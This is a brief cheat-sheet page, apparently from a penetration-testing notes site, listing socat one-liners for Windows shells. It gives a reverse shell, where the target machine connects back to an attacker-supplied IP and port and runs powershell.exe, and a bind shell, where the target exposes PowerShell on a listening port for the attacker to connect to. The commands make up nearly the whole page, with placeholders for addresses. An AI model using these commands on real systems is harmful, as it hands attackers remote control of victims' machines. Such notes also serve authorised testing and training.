socat shells
Reverse shell:
# listener on attacking machine.
socat TCP-L:<port> -
# connector on target machine
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
Bind Shell:
# windows listener
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
# connect to listener using attacking machine.
socat TCP:<TARGET-IP>:<TARGET-PORT> -
Last updated
Was this helpful?